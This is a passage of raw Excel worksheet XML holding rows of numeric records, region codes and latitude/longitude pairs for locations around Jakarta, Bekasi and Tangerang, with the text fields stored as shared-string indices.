      <c r="X1322" t="s">
        <v>19456</v>
      </c>
      <c r="Y1322" t="str">
        <f t="shared" si="20"/>
        <v>-6.16674,106.90924</v>
      </c>
    </row>
    <row r="1323" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1323">
        <v>108895</v>
      </c>
      <c r="B1323" s="1">
        <v>43885</v>
      </c>
      <c r="C1323">
        <v>1</v>
      </c>
      <c r="D1323" t="s">
        <v>22</v>
      </c>
      <c r="E1323" t="s">
        <v>23</v>
      </c>
      <c r="F1323" t="s">
        <v>4799</v>
      </c>
      <c r="G1323" t="s">
        <v>4800</v>
      </c>
      <c r="H1323" t="s">
        <v>26</v>
      </c>
      <c r="I1323" t="s">
        <v>3716</v>
      </c>
      <c r="J1323" t="s">
        <v>2627</v>
      </c>
      <c r="L1323" t="s">
        <v>4801</v>
      </c>
      <c r="M1323">
        <v>3275010008</v>
      </c>
      <c r="N1323">
        <v>3275010</v>
      </c>
      <c r="O1323">
        <v>3275</v>
      </c>
      <c r="P1323">
        <v>32</v>
      </c>
      <c r="Q1323" t="s">
        <v>2236</v>
      </c>
      <c r="R1323" t="s">
        <v>287</v>
      </c>
      <c r="S1323" t="s">
        <v>41</v>
      </c>
      <c r="T1323" t="s">
        <v>42</v>
      </c>
      <c r="U1323" s="5">
        <v>10693678</v>
      </c>
      <c r="V1323" s="5" t="s">
        <v>15681</v>
      </c>
      <c r="W1323" s="5">
        <v>-628081</v>
      </c>
      <c r="X1323" t="s">
        <v>19457</v>
      </c>
      <c r="Y1323" t="str">
        <f t="shared" si="20"/>
        <v>-6.28081,106.93678</v>
      </c>
    </row>
    <row r="1324" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1324">
        <v>108896</v>
      </c>
      <c r="B1324" s="1">
        <v>43885</v>
      </c>
      <c r="C1324">
        <v>1</v>
      </c>
      <c r="D1324" t="s">
        <v>22</v>
      </c>
      <c r="E1324" t="s">
        <v>23</v>
      </c>
      <c r="F1324" t="s">
        <v>4802</v>
      </c>
      <c r="G1324" t="s">
        <v>4803</v>
      </c>
      <c r="H1324" t="s">
        <v>26</v>
      </c>
      <c r="I1324" t="s">
        <v>27</v>
      </c>
      <c r="J1324" t="s">
        <v>2627</v>
      </c>
      <c r="L1324" t="s">
        <v>4804</v>
      </c>
      <c r="M1324">
        <v>3275050003</v>
      </c>
      <c r="N1324">
        <v>3275050</v>
      </c>
      <c r="O1324">
        <v>3275</v>
      </c>
      <c r="P1324">
        <v>32</v>
      </c>
      <c r="Q1324" t="s">
        <v>2310</v>
      </c>
      <c r="R1324" t="s">
        <v>955</v>
      </c>
      <c r="S1324" t="s">
        <v>41</v>
      </c>
      <c r="T1324" t="s">
        <v>42</v>
      </c>
      <c r="U1324" s="5">
        <v>10698426</v>
      </c>
      <c r="V1324" s="5" t="s">
        <v>15682</v>
      </c>
      <c r="W1324" s="5">
        <v>-625086</v>
      </c>
      <c r="X1324" t="s">
        <v>19458</v>
      </c>
      <c r="Y1324" t="str">
        <f t="shared" si="20"/>
        <v>-6.25086,106.98426</v>
      </c>
    </row>
    <row r="1325" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1325">
        <v>108897</v>
      </c>
      <c r="B1325" s="1">
        <v>43885</v>
      </c>
      <c r="C1325">
        <v>1</v>
      </c>
      <c r="D1325" t="s">
        <v>22</v>
      </c>
      <c r="E1325" t="s">
        <v>23</v>
      </c>
      <c r="F1325" t="s">
        <v>4805</v>
      </c>
      <c r="G1325" t="s">
        <v>4806</v>
      </c>
      <c r="H1325" t="s">
        <v>26</v>
      </c>
      <c r="I1325" t="s">
        <v>2293</v>
      </c>
      <c r="J1325" t="s">
        <v>2916</v>
      </c>
      <c r="L1325" t="s">
        <v>4807</v>
      </c>
      <c r="M1325">
        <v>3172040003</v>
      </c>
      <c r="N1325">
        <v>3172040</v>
      </c>
      <c r="O1325">
        <v>3172</v>
      </c>
      <c r="P1325">
        <v>31</v>
      </c>
      <c r="Q1325" t="s">
        <v>552</v>
      </c>
      <c r="R1325" t="s">
        <v>281</v>
      </c>
      <c r="S1325" t="s">
        <v>49</v>
      </c>
      <c r="T1325" t="s">
        <v>33</v>
      </c>
      <c r="U1325" s="5">
        <v>10688218</v>
      </c>
      <c r="V1325" s="5" t="s">
        <v>15683</v>
      </c>
      <c r="W1325" s="5">
        <v>-626607</v>
      </c>
      <c r="X1325" t="s">
        <v>19459</v>
      </c>
      <c r="Y1325" t="str">
        <f t="shared" si="20"/>
        <v>-6.26607,106.88218</v>
      </c>
    </row>
    <row r="1326" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1326">
        <v>108898</v>
      </c>
      <c r="B1326" s="1">
        <v>43885</v>
      </c>
      <c r="C1326">
        <v>1</v>
      </c>
      <c r="D1326" t="s">
        <v>22</v>
      </c>
      <c r="E1326" t="s">
        <v>23</v>
      </c>
      <c r="F1326" t="s">
        <v>4808</v>
      </c>
      <c r="H1326" t="s">
        <v>26</v>
      </c>
      <c r="I1326" t="s">
        <v>2188</v>
      </c>
      <c r="J1326" t="s">
        <v>2627</v>
      </c>
      <c r="L1326" t="s">
        <v>4809</v>
      </c>
      <c r="M1326">
        <v>3275010008</v>
      </c>
      <c r="N1326">
        <v>3275010</v>
      </c>
      <c r="O1326">
        <v>3275</v>
      </c>
      <c r="P1326">
        <v>32</v>
      </c>
      <c r="Q1326" t="s">
        <v>2236</v>
      </c>
      <c r="R1326" t="s">
        <v>287</v>
      </c>
      <c r="S1326" t="s">
        <v>41</v>
      </c>
      <c r="T1326" t="s">
        <v>42</v>
      </c>
      <c r="U1326" s="5">
        <v>10693752</v>
      </c>
      <c r="V1326" s="5" t="s">
        <v>15684</v>
      </c>
      <c r="W1326" s="5">
        <v>-628000</v>
      </c>
      <c r="X1326" t="s">
        <v>19460</v>
      </c>
      <c r="Y1326" t="str">
        <f t="shared" si="20"/>
        <v>-6.28000,106.93752</v>
      </c>
    </row>
    <row r="1327" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1327">
        <v>108899</v>
      </c>
      <c r="B1327" s="1">
        <v>43885</v>
      </c>
      <c r="C1327">
        <v>1</v>
      </c>
      <c r="D1327" t="s">
        <v>22</v>
      </c>
      <c r="E1327" t="s">
        <v>23</v>
      </c>
      <c r="F1327" t="s">
        <v>4810</v>
      </c>
      <c r="G1327" t="s">
        <v>4811</v>
      </c>
      <c r="H1327" t="s">
        <v>26</v>
      </c>
      <c r="I1327" t="s">
        <v>1394</v>
      </c>
      <c r="J1327" t="s">
        <v>4812</v>
      </c>
      <c r="L1327" t="s">
        <v>4813</v>
      </c>
      <c r="M1327">
        <v>3172100006</v>
      </c>
      <c r="N1327">
        <v>3172100</v>
      </c>
      <c r="O1327">
        <v>3172</v>
      </c>
      <c r="P1327">
        <v>31</v>
      </c>
      <c r="Q1327" t="s">
        <v>1435</v>
      </c>
      <c r="R1327" t="s">
        <v>1436</v>
      </c>
      <c r="S1327" t="s">
        <v>49</v>
      </c>
      <c r="T1327" t="s">
        <v>33</v>
      </c>
      <c r="U1327" s="5">
        <v>10686998</v>
      </c>
      <c r="V1327" s="5" t="s">
        <v>15685</v>
      </c>
      <c r="W1327" s="5">
        <v>-619387</v>
      </c>
      <c r="X1327" t="s">
        <v>19461</v>
      </c>
      <c r="Y1327" t="str">
        <f t="shared" si="20"/>
        <v>-6.19387,106.86998</v>
      </c>
    </row>
    <row r="1328" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1328">
        <v>108900</v>
      </c>
      <c r="B1328" s="1">
        <v>43885</v>
      </c>
      <c r="C1328">
        <v>1</v>
      </c>
      <c r="D1328" t="s">
        <v>22</v>
      </c>
      <c r="E1328" t="s">
        <v>23</v>
      </c>
      <c r="F1328" t="s">
        <v>4814</v>
      </c>
      <c r="G1328" t="s">
        <v>4815</v>
      </c>
      <c r="H1328" t="s">
        <v>26</v>
      </c>
      <c r="I1328" t="s">
        <v>555</v>
      </c>
      <c r="J1328" t="s">
        <v>4816</v>
      </c>
      <c r="L1328" t="s">
        <v>4817</v>
      </c>
      <c r="M1328">
        <v>3174060005</v>
      </c>
      <c r="N1328">
        <v>3174060</v>
      </c>
      <c r="O1328">
        <v>3174</v>
      </c>
      <c r="P1328">
        <v>31</v>
      </c>
      <c r="Q1328" t="s">
        <v>4818</v>
      </c>
      <c r="R1328" t="s">
        <v>1762</v>
      </c>
      <c r="S1328" t="s">
        <v>32</v>
      </c>
      <c r="T1328" t="s">
        <v>33</v>
      </c>
      <c r="U1328" s="5">
        <v>10681897</v>
      </c>
      <c r="V1328" s="5" t="s">
        <v>15686</v>
      </c>
      <c r="W1328" s="5">
        <v>-614102</v>
      </c>
      <c r="X1328" t="s">
        <v>19462</v>
      </c>
      <c r="Y1328" t="str">
        <f t="shared" si="20"/>
        <v>-6.14102,106.81897</v>
      </c>
    </row>
    <row r="1329" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1329">
        <v>108901</v>
      </c>
      <c r="B1329" s="1">
        <v>43885</v>
      </c>
      <c r="C1329">
        <v>1</v>
      </c>
      <c r="D1329" t="s">
        <v>22</v>
      </c>
      <c r="E1329" t="s">
        <v>23</v>
      </c>
      <c r="F1329" t="s">
        <v>4819</v>
      </c>
      <c r="G1329" t="s">
        <v>4820</v>
      </c>
      <c r="H1329" t="s">
        <v>26</v>
      </c>
      <c r="I1329" t="s">
        <v>1310</v>
      </c>
      <c r="J1329" t="s">
        <v>2627</v>
      </c>
      <c r="L1329" t="s">
        <v>4821</v>
      </c>
      <c r="M1329">
        <v>3275041003</v>
      </c>
      <c r="N1329">
        <v>3275041</v>
      </c>
      <c r="O1329">
        <v>3275</v>
      </c>
      <c r="P1329">
        <v>32</v>
      </c>
      <c r="Q1329" t="s">
        <v>432</v>
      </c>
      <c r="R1329" t="s">
        <v>134</v>
      </c>
      <c r="S1329" t="s">
        <v>41</v>
      </c>
      <c r="T1329" t="s">
        <v>42</v>
      </c>
      <c r="U1329" s="5">
        <v>10699484</v>
      </c>
      <c r="V1329" s="5" t="s">
        <v>15687</v>
      </c>
      <c r="W1329" s="5">
        <v>-626050</v>
      </c>
      <c r="X1329" t="s">
        <v>19463</v>
      </c>
      <c r="Y1329" t="str">
        <f t="shared" si="20"/>
        <v>-6.26050,106.99484</v>
      </c>
    </row>
    <row r="1330" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1330">
        <v>108902</v>
      </c>
      <c r="B1330" s="1">
        <v>43885</v>
      </c>
      <c r="C1330">
        <v>1</v>
      </c>
      <c r="D1330" t="s">
        <v>22</v>
      </c>
      <c r="E1330" t="s">
        <v>23</v>
      </c>
      <c r="F1330" t="s">
        <v>4822</v>
      </c>
      <c r="G1330" t="s">
        <v>4823</v>
      </c>
      <c r="H1330" t="s">
        <v>26</v>
      </c>
      <c r="I1330" t="s">
        <v>974</v>
      </c>
      <c r="J1330" t="s">
        <v>3135</v>
      </c>
      <c r="M1330">
        <v>3671010001</v>
      </c>
      <c r="N1330">
        <v>3671010</v>
      </c>
      <c r="O1330">
        <v>3671</v>
      </c>
      <c r="P1330">
        <v>36</v>
      </c>
      <c r="Q1330" t="s">
        <v>4656</v>
      </c>
      <c r="R1330" t="s">
        <v>200</v>
      </c>
      <c r="S1330" t="s">
        <v>201</v>
      </c>
      <c r="T1330" t="s">
        <v>171</v>
      </c>
      <c r="U1330" s="5">
        <v>10669672</v>
      </c>
      <c r="V1330" s="5" t="s">
        <v>15688</v>
      </c>
      <c r="W1330" s="5">
        <v>-623415</v>
      </c>
      <c r="X1330" t="s">
        <v>19464</v>
      </c>
      <c r="Y1330" t="str">
        <f t="shared" si="20"/>
        <v>-6.23415,106.69672</v>
      </c>
    </row>
    <row r="1331" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1331">
        <v>108903</v>
      </c>
      <c r="B1331" s="1">
        <v>43885</v>
      </c>
      <c r="C1331">
        <v>1</v>
      </c>
      <c r="D1331" t="s">
        <v>85</v>
      </c>
      <c r="E1331" t="s">
        <v>23</v>
      </c>
      <c r="F1331" t="s">
        <v>4824</v>
      </c>
      <c r="G1331" t="s">
        <v>4825</v>
      </c>
      <c r="H1331" t="s">
        <v>26</v>
      </c>
      <c r="I1331" t="s">
        <v>608</v>
      </c>
      <c r="J1331" t="s">
        <v>306</v>
      </c>
      <c r="K1331" t="s">
        <v>4826</v>
      </c>
      <c r="L1331" t="s">
        <v>4827</v>
      </c>
      <c r="M1331">
        <v>3172060001</v>
      </c>
      <c r="N1331">
        <v>3172060</v>
      </c>
      <c r="O1331">
        <v>3172</v>
      </c>
      <c r="P1331">
        <v>31</v>
      </c>
      <c r="Q1331" t="s">
        <v>309</v>
      </c>
      <c r="R1331" t="s">
        <v>48</v>
      </c>
      <c r="S1331" t="s">
        <v>49</v>
      </c>
      <c r="T1331" t="s">
        <v>33</v>
      </c>
      <c r="U1331" s="5">
        <v>10686713</v>
      </c>
      <c r="V1331" s="5" t="s">
        <v>15689</v>
      </c>
      <c r="W1331" s="5">
        <v>-623851</v>
      </c>
      <c r="X1331" t="s">
        <v>19465</v>
      </c>
      <c r="Y1331" t="str">
        <f t="shared" si="20"/>
        <v>-6.23851,106.86713</v>
      </c>
    </row>
    <row r="1332" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1332">
        <v>108904</v>
      </c>
      <c r="B1332" s="1">
        <v>43885</v>
      </c>
      <c r="C1332">
        <v>1</v>
      </c>
      <c r="D1332" t="s">
        <v>22</v>
      </c>
      <c r="E1332" t="s">
        <v>23</v>
      </c>
      <c r="F1332" t="s">
        <v>4828</v>
      </c>
      <c r="H1332" t="s">
        <v>26</v>
      </c>
      <c r="I1332" t="s">
        <v>1683</v>
      </c>
      <c r="J1332" t="s">
        <v>4829</v>
      </c>
      <c r="L1332" t="s">
        <v>4830</v>
      </c>
      <c r="M1332">
        <v>3173030003</v>
      </c>
      <c r="N1332">
        <v>3173030</v>
      </c>
      <c r="O1332">
        <v>3173</v>
      </c>
      <c r="P1332">
        <v>31</v>
      </c>
      <c r="Q1332" t="s">
        <v>3224</v>
      </c>
      <c r="R1332" t="s">
        <v>3128</v>
      </c>
      <c r="S1332" t="s">
        <v>62</v>
      </c>
      <c r="T1332" t="s">
        <v>33</v>
      </c>
      <c r="U1332" s="5">
        <v>10684458</v>
      </c>
      <c r="V1332" s="5" t="s">
        <v>15690</v>
      </c>
      <c r="W1332" s="5">
        <v>-618275</v>
      </c>
      <c r="X1332" t="s">
        <v>19466</v>
      </c>
      <c r="Y1332" t="str">
        <f t="shared" si="20"/>
        <v>-6.18275,106.84458</v>
      </c>
    </row>
    <row r="1333" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1333">
        <v>108905</v>
      </c>
      <c r="B1333" s="1">
        <v>43885</v>
      </c>
      <c r="C1333">
        <v>1</v>
      </c>
      <c r="D1333" t="s">
        <v>22</v>
      </c>
      <c r="E1333" t="s">
        <v>23</v>
      </c>
      <c r="F1333" t="s">
        <v>4831</v>
      </c>
      <c r="G1333" t="s">
        <v>4832</v>
      </c>
      <c r="H1333" t="s">
        <v>26</v>
      </c>
      <c r="I1333" t="s">
        <v>4833</v>
      </c>
      <c r="J1333" t="s">
        <v>3166</v>
      </c>
      <c r="L1333" t="s">
        <v>4834</v>
      </c>
      <c r="M1333">
        <v>3172100002</v>
      </c>
      <c r="N1333">
        <v>3172100</v>
      </c>
      <c r="O1333">
        <v>3172</v>
      </c>
      <c r="P1333">
        <v>31</v>
      </c>
      <c r="Q1333" t="s">
        <v>3168</v>
      </c>
      <c r="R1333" t="s">
        <v>1436</v>
      </c>
      <c r="S1333" t="s">
        <v>49</v>
      </c>
      <c r="T1333" t="s">
        <v>33</v>
      </c>
      <c r="U1333" s="5">
        <v>10685425</v>
      </c>
      <c r="V1333" s="5" t="s">
        <v>15691</v>
      </c>
      <c r="W1333" s="5">
        <v>-619933</v>
      </c>
      <c r="X1333" t="s">
        <v>18271</v>
      </c>
      <c r="Y1333" t="str">
        <f t="shared" si="20"/>
        <v>-6.19933,106.85425</v>
      </c>
    </row>
    <row r="1334" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1334">
        <v>108906</v>
      </c>
      <c r="B1334" s="1">
        <v>43885</v>
      </c>
      <c r="C1334">
        <v>1</v>
      </c>
      <c r="D1334" t="s">
        <v>22</v>
      </c>
      <c r="E1334" t="s">
        <v>23</v>
      </c>
      <c r="F1334" t="s">
        <v>4835</v>
      </c>
      <c r="G1334" t="s">
        <v>4836</v>
      </c>
      <c r="H1334" t="s">
        <v>26</v>
      </c>
      <c r="I1334" t="s">
        <v>1513</v>
      </c>
      <c r="J1334" t="s">
        <v>3184</v>
      </c>
      <c r="L1334" t="s">
        <v>4837</v>
      </c>
      <c r="M1334">
        <v>3172070007</v>
      </c>
      <c r="N1334">
        <v>3172070</v>
      </c>
      <c r="O1334">
        <v>3172</v>
      </c>
      <c r="P1334">
        <v>31</v>
      </c>
      <c r="Q1334" t="s">
        <v>3186</v>
      </c>
      <c r="R1334" t="s">
        <v>128</v>
      </c>
      <c r="S1334" t="s">
        <v>49</v>
      </c>
      <c r="T1334" t="s">
        <v>33</v>
      </c>
      <c r="U1334" s="5">
        <v>10690419</v>
      </c>
      <c r="V1334" s="5" t="s">
        <v>15692</v>
      </c>
      <c r="W1334" s="5">
        <v>-621766</v>
      </c>
      <c r="X1334" t="s">
        <v>18302</v>
      </c>
      <c r="Y1334" t="str">
        <f t="shared" si="20"/>
        <v>-6.21766,106.90419</v>
      </c>
    </row>
    <row r="1335" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1335">
        <v>108907</v>
      </c>
      <c r="B1335" s="1">
        <v>43885</v>
      </c>
      <c r="C1335">
        <v>1</v>
      </c>
      <c r="D1335" t="s">
        <v>22</v>
      </c>
      <c r="E1335" t="s">
        <v>23</v>
      </c>
      <c r="F1335" t="s">
        <v>4838</v>
      </c>
      <c r="G1335" t="s">
        <v>4839</v>
      </c>
      <c r="H1335" t="s">
        <v>26</v>
      </c>
      <c r="I1335" t="s">
        <v>76</v>
      </c>
      <c r="J1335" t="s">
        <v>2627</v>
      </c>
      <c r="M1335">
        <v>3275010012</v>
      </c>
      <c r="N1335">
        <v>3275010</v>
      </c>
      <c r="O1335">
        <v>3275</v>
      </c>
      <c r="P1335">
        <v>32</v>
      </c>
      <c r="Q1335" t="s">
        <v>2322</v>
      </c>
      <c r="R1335" t="s">
        <v>287</v>
      </c>
      <c r="S1335" t="s">
        <v>41</v>
      </c>
      <c r="T1335" t="s">
        <v>42</v>
      </c>
      <c r="U1335" s="5">
        <v>10692906</v>
      </c>
      <c r="V1335" s="5" t="s">
        <v>15693</v>
      </c>
      <c r="W1335" s="5">
        <v>-626182</v>
      </c>
      <c r="X1335" t="s">
        <v>19467</v>
      </c>
      <c r="Y1335" t="str">
        <f t="shared" si="20"/>
        <v>-6.26182,106.92906</v>
      </c>
    </row>
    <row r="1336" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1336">
        <v>108908</v>
      </c>
      <c r="B1336" s="1">
        <v>43885</v>
      </c>
      <c r="C1336">
        <v>1</v>
      </c>
      <c r="D1336" t="s">
        <v>22</v>
      </c>
      <c r="E1336" t="s">
        <v>23</v>
      </c>
      <c r="F1336" t="s">
        <v>4840</v>
      </c>
      <c r="H1336" t="s">
        <v>26</v>
      </c>
      <c r="I1336" t="s">
        <v>843</v>
      </c>
      <c r="J1336" t="s">
        <v>2627</v>
      </c>
      <c r="L1336" t="s">
        <v>4841</v>
      </c>
      <c r="M1336">
        <v>3275010011</v>
      </c>
      <c r="N1336">
        <v>3275010</v>
      </c>
      <c r="O1336">
        <v>3275</v>
      </c>
      <c r="P1336">
        <v>32</v>
      </c>
      <c r="Q1336" t="s">
        <v>2389</v>
      </c>
      <c r="R1336" t="s">
        <v>287</v>
      </c>
      <c r="S1336" t="s">
        <v>41</v>
      </c>
      <c r="T1336" t="s">
        <v>42</v>
      </c>
      <c r="U1336" s="5">
        <v>10692212</v>
      </c>
      <c r="V1336" s="5" t="s">
        <v>15694</v>
      </c>
      <c r="W1336" s="5">
        <v>-625948</v>
      </c>
      <c r="X1336" t="s">
        <v>19468</v>
      </c>
      <c r="Y1336" t="str">
        <f t="shared" si="20"/>
        <v>-6.25948,106.92212</v>
      </c>
    </row>
    <row r="1337" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1337">
        <v>108909</v>
      </c>
      <c r="B1337" s="1">
        <v>43885</v>
      </c>
      <c r="C1337">
        <v>1</v>
      </c>
      <c r="D1337" t="s">
        <v>22</v>
      </c>
      <c r="E1337" t="s">
        <v>23</v>
      </c>
      <c r="F1337" t="s">
        <v>4842</v>
      </c>
      <c r="G1337" t="s">
        <v>4843</v>
      </c>
      <c r="H1337" t="s">
        <v>26</v>
      </c>
      <c r="I1337" t="s">
        <v>27</v>
      </c>
      <c r="J1337" t="s">
        <v>3066</v>
      </c>
      <c r="M1337">
        <v>3173020001</v>
      </c>
      <c r="N1337">
        <v>3173020</v>
      </c>
      <c r="O1337">
        <v>3173</v>
      </c>
      <c r="P1337">
        <v>31</v>
      </c>
      <c r="Q1337" t="s">
        <v>179</v>
      </c>
      <c r="R1337" t="s">
        <v>179</v>
      </c>
      <c r="S1337" t="s">
        <v>62</v>
      </c>
      <c r="T1337" t="s">
        <v>33</v>
      </c>
      <c r="U1337" s="5">
        <v>10683408</v>
      </c>
      <c r="V1337" s="5" t="s">
        <v>15222</v>
      </c>
      <c r="W1337" s="5">
        <v>-619876</v>
      </c>
      <c r="X1337" t="s">
        <v>19012</v>
      </c>
      <c r="Y1337" t="str">
        <f t="shared" si="20"/>
        <v>-6.19876,106.83408</v>
      </c>
    </row>
    <row r="1338" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1338">
        <v>108910</v>
      </c>
      <c r="B1338" s="1">
        <v>43885</v>
      </c>
      <c r="C1338">
        <v>1</v>
      </c>
      <c r="D1338" t="s">
        <v>22</v>
      </c>
      <c r="E1338" t="s">
        <v>23</v>
      </c>
      <c r="F1338" t="s">
        <v>4844</v>
      </c>
      <c r="G1338" t="s">
        <v>4845</v>
      </c>
      <c r="H1338" t="s">
        <v>26</v>
      </c>
      <c r="I1338" t="s">
        <v>1953</v>
      </c>
      <c r="J1338" t="s">
        <v>2627</v>
      </c>
      <c r="L1338" t="s">
        <v>4846</v>
      </c>
      <c r="M1338">
        <v>3275060003</v>
      </c>
      <c r="N1338">
        <v>3275060</v>
      </c>
      <c r="O1338">
        <v>3275</v>
      </c>
      <c r="P1338">
        <v>32</v>
      </c>
      <c r="Q1338" t="s">
        <v>146</v>
      </c>
      <c r="R1338" t="s">
        <v>114</v>
      </c>
      <c r="S1338" t="s">
        <v>41</v>
      </c>
      <c r="T1338" t="s">
        <v>42</v>
      </c>
      <c r="U1338" s="5">
        <v>10696883</v>
      </c>
      <c r="V1338" s="5" t="s">
        <v>15695</v>
      </c>
      <c r="W1338" s="5">
        <v>-623142</v>
      </c>
      <c r="X1338" t="s">
        <v>19469</v>
      </c>
      <c r="Y1338" t="str">
        <f t="shared" si="20"/>
        <v>-6.23142,106.96883</v>
      </c>
    </row>
    <row r="1339" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1339">
        <v>108911</v>
      </c>
      <c r="B1339" s="1">
        <v>43885</v>
      </c>
      <c r="C1339">
        <v>1</v>
      </c>
      <c r="D1339" t="s">
        <v>22</v>
      </c>
      <c r="E1339" t="s">
        <v>23</v>
      </c>
      <c r="F1339" t="s">
        <v>4847</v>
      </c>
      <c r="G1339" t="s">
        <v>4848</v>
      </c>
      <c r="H1339" t="s">
        <v>26</v>
      </c>
      <c r="I1339" t="s">
        <v>555</v>
      </c>
      <c r="J1339" t="s">
        <v>4849</v>
      </c>
      <c r="M1339">
        <v>3173060004</v>
      </c>
      <c r="N1339">
        <v>3173060</v>
      </c>
      <c r="O1339">
        <v>3173</v>
      </c>
      <c r="P1339">
        <v>31</v>
      </c>
      <c r="Q1339" t="s">
        <v>4713</v>
      </c>
      <c r="R1339" t="s">
        <v>61</v>
      </c>
      <c r="S1339" t="s">
        <v>62</v>
      </c>
      <c r="T1339" t="s">
        <v>33</v>
      </c>
      <c r="U1339" s="5">
        <v>10685866</v>
      </c>
      <c r="V1339" s="5" t="s">
        <v>15696</v>
      </c>
      <c r="W1339" s="5">
        <v>-615854</v>
      </c>
      <c r="X1339" t="s">
        <v>18355</v>
      </c>
      <c r="Y1339" t="str">
        <f t="shared" si="20"/>
        <v>-6.15854,106.85866</v>
      </c>
    </row>
    <row r="1340" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1340">
        <v>108912</v>
      </c>
      <c r="B1340" s="1">
        <v>43885</v>
      </c>
      <c r="C1340">
        <v>1</v>
      </c>
      <c r="D1340" t="s">
        <v>22</v>
      </c>
      <c r="E1340" t="s">
        <v>23</v>
      </c>
      <c r="F1340" t="s">
        <v>4850</v>
      </c>
      <c r="G1340" t="s">
        <v>4851</v>
      </c>
      <c r="H1340" t="s">
        <v>26</v>
      </c>
      <c r="I1340" t="s">
        <v>3275</v>
      </c>
      <c r="J1340" t="s">
        <v>2230</v>
      </c>
      <c r="L1340" t="s">
        <v>4852</v>
      </c>
      <c r="M1340">
        <v>3175030002</v>
      </c>
      <c r="N1340">
        <v>3175030</v>
      </c>
      <c r="O1340">
        <v>3175</v>
      </c>
      <c r="P1340">
        <v>31</v>
      </c>
      <c r="Q1340" t="s">
        <v>1592</v>
      </c>
      <c r="R1340" t="s">
        <v>1563</v>
      </c>
      <c r="S1340" t="s">
        <v>547</v>
      </c>
      <c r="T1340" t="s">
        <v>33</v>
      </c>
      <c r="U1340" s="5">
        <v>10687436</v>
      </c>
      <c r="V1340" s="5" t="s">
        <v>15697</v>
      </c>
      <c r="W1340" s="5">
        <v>-615439</v>
      </c>
      <c r="X1340" t="s">
        <v>19470</v>
      </c>
      <c r="Y1340" t="str">
        <f t="shared" si="20"/>
        <v>-6.15439,106.87436</v>
      </c>
    </row>
    <row r="1341" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1341">
        <v>108913</v>
      </c>
      <c r="B1341" s="1">
        <v>43885</v>
      </c>
      <c r="C1341">
        <v>1</v>
      </c>
      <c r="D1341" t="s">
        <v>22</v>
      </c>
      <c r="E1341" t="s">
        <v>23</v>
      </c>
      <c r="F1341" t="s">
        <v>4853</v>
      </c>
      <c r="G1341" t="s">
        <v>4854</v>
      </c>
      <c r="H1341" t="s">
        <v>26</v>
      </c>
      <c r="I1341" t="s">
        <v>882</v>
      </c>
      <c r="J1341" t="s">
        <v>3135</v>
      </c>
      <c r="M1341">
        <v>3674060007</v>
      </c>
      <c r="N1341">
        <v>3674060</v>
      </c>
      <c r="O1341">
        <v>3674</v>
      </c>
      <c r="P1341">
        <v>36</v>
      </c>
      <c r="Q1341" t="s">
        <v>169</v>
      </c>
      <c r="R1341" t="s">
        <v>169</v>
      </c>
      <c r="S1341" t="s">
        <v>170</v>
      </c>
      <c r="T1341" t="s">
        <v>171</v>
      </c>
      <c r="U1341" s="5">
        <v>10671208</v>
      </c>
      <c r="V1341" s="5" t="s">
        <v>15698</v>
      </c>
      <c r="W1341" s="5">
        <v>-626784</v>
      </c>
      <c r="X1341" t="s">
        <v>19471</v>
      </c>
      <c r="Y1341" t="str">
        <f t="shared" si="20"/>
        <v>-6.26784,106.71208</v>
      </c>
    </row>
    <row r="1342" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1342">
        <v>108914</v>
      </c>
      <c r="B1342" s="1">
        <v>43885</v>
      </c>
      <c r="C1342">
        <v>1</v>
      </c>
      <c r="D1342" t="s">
        <v>22</v>
      </c>
      <c r="E1342" t="s">
        <v>23</v>
      </c>
      <c r="F1342" t="s">
        <v>4855</v>
      </c>
      <c r="G1342" t="s">
        <v>4856</v>
      </c>
      <c r="H1342" t="s">
        <v>26</v>
      </c>
      <c r="I1342" t="s">
        <v>4441</v>
      </c>
      <c r="J1342" t="s">
        <v>2438</v>
      </c>
      <c r="L1342" t="s">
        <v>4857</v>
      </c>
      <c r="M1342">
        <v>3175050003</v>
      </c>
      <c r="N1342">
        <v>3175050</v>
      </c>
      <c r="O1342">
        <v>3175</v>
      </c>
      <c r="P1342">
        <v>31</v>
      </c>
      <c r="Q1342" t="s">
        <v>1740</v>
      </c>
      <c r="R1342" t="s">
        <v>1013</v>
      </c>
      <c r="S1342" t="s">
        <v>547</v>
      </c>
      <c r="T1342" t="s">
        <v>33</v>
      </c>
      <c r="U1342" s="5">
        <v>10691108</v>
      </c>
      <c r="V1342" s="5" t="s">
        <v>15699</v>
      </c>
      <c r="W1342" s="5">
        <v>-614671</v>
      </c>
      <c r="X1342" t="s">
        <v>19472</v>
      </c>
      <c r="Y1342" t="str">
        <f t="shared" si="20"/>
        <v>-6.14671,106.91108</v>
      </c>
    </row>
    <row r="1343" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1343">
        <v>108915</v>
      </c>
      <c r="B1343" s="1">
        <v>43885</v>
      </c>
      <c r="C1343">
        <v>1</v>
      </c>
      <c r="D1343" t="s">
        <v>22</v>
      </c>
      <c r="E1343" t="s">
        <v>23</v>
      </c>
      <c r="F1343" t="s">
        <v>4858</v>
      </c>
      <c r="G1343" t="s">
        <v>4859</v>
      </c>
      <c r="H1343" t="s">
        <v>26</v>
      </c>
      <c r="I1343" t="s">
        <v>882</v>
      </c>
      <c r="J1343" t="s">
        <v>2627</v>
      </c>
      <c r="M1343">
        <v>3275060005</v>
      </c>
      <c r="N1343">
        <v>3275060</v>
      </c>
      <c r="O1343">
        <v>3275</v>
      </c>
      <c r="P1343">
        <v>32</v>
      </c>
      <c r="Q1343" t="s">
        <v>3526</v>
      </c>
